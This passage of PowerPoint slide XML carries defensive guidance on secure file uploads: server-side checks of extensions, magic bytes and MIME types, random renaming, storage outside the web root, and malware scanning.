            <a:ext cx="593765" cy="593765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196316" y="2699266"/>
            <a:ext cx="237530" cy="296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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394365" y="3342442"/>
            <a:ext cx="2474238" cy="309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Verify on the Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394365" y="3770352"/>
            <a:ext cx="3841552" cy="1266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Perform all validation server-side. Check extensions, magic bytes, and MIME types independently. Never trust client-provided data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9654540" y="2847618"/>
            <a:ext cx="4283154" cy="2410301"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4552"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBFCF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4540" y="2824758"/>
            <a:ext cx="4283154" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19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99235" y="2550795"/>
            <a:ext cx="593765" cy="593765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11677352" y="2699266"/>
            <a:ext cx="237530" cy="296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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9875282" y="3342442"/>
            <a:ext cx="2746415" cy="309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Rename Uploaded Files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9875282" y="3770352"/>
            <a:ext cx="3841671" cy="1266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Generate new, random filenames using UUIDs or hashes. This prevents execution via predictable paths and extension-based attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692706" y="5752624"/>
            <a:ext cx="6523553" cy="1776889"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6175"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBFCF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4" name="Image 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706" y="5729764"/>
            <a:ext cx="6523553" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25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540" y="5455801"/>
            <a:ext cx="593765" cy="593765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3835658" y="5604272"/>
            <a:ext cx="237530" cy="296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4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913448" y="6247448"/>
            <a:ext cx="2705338" cy="309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Store Outside Web Root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913448" y="6675358"/>
            <a:ext cx="6082070" cy="633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Save files in a directory not accessible via URL. Serve them through a download script that sets proper headers and validates access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7414141" y="5752624"/>
            <a:ext cx="6523553" cy="1776889"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6175"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBFCF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0" name="Image 8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4141" y="5729764"/>
            <a:ext cx="6523553" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Image 9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8976" y="5455801"/>
            <a:ext cx="593765" cy="593765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10557093" y="5604272"/>
            <a:ext cx="237530" cy="296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5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7634883" y="6247448"/>
            <a:ext cx="2474238" cy="309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Scan for Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7634883" y="6675358"/>
            <a:ext cx="6082070" cy="633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Integrate antivirus scanning for all uploads using ClamAV or commercial solutions. Quarantine suspicious files for manual review.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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043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6977" y="453390"/>
            <a:ext cx="4121825" cy="515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50"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="32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Key Takeaways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576977" y="1215866"/>
            <a:ext cx="7990046" cy="1030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100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="64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Trust No File</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576977" y="2493645"/>
            <a:ext cx="7990046" cy="1030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100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="64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Verify Everything</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576977" y="3771424"/>
            <a:ext cx="3912632" cy="1477447"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1674"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9EC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41759" y="3936206"/>
            <a:ext cx="2852499" cy="257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File Identification is Complex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41759" y="4292560"/>
            <a:ext cx="3583067" cy="791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Extensions, magic bytes, and MIME types all play roles in file recognition—each can be exploited independently.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4654391" y="3771424"/>
            <a:ext cx="3912632" cy="1477447"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1674"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9EC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4819174" y="3936206"/>
            <a:ext cx="2943463" cy="257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Single Checks Are Insufficient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819174" y="4292560"/>
            <a:ext cx="3583067" cy="791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Relying on any one validation method creates vulnerabilities. Attackers will exploit the weakest link.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576977" y="5413653"/>
            <a:ext cx="7990046" cy="1213604"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2038"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9EC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741759" y="5578435"/>
            <a:ext cx="2801422" cy="257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Defense in Depth is Essential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741759" y="5934789"/>
            <a:ext cx="7660481" cy="5276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Only a layered, server-side defense strategy with multiple validation mechanisms can truly secure file uploads.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576977" y="6812637"/>
            <a:ext cx="7990046" cy="964406"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2564"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C3CFE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759" y="7057311"/>
            <a:ext cx="205978" cy="164783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1112520" y="7018615"/>
            <a:ext cx="7289721" cy="5276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Remember:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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Every file upload feature is a potential attack vector. Treat all uploaded content as hostile until proven safe through rigorous, multi-layered validation.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110</TotalTime>
  <Words>1100</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>122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Consolas</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Roboto Slab</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto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Hamza Nour</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-16T15:21:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-16T17:12:36Z</dcterms:modified>
</cp:coreProperties>
</file>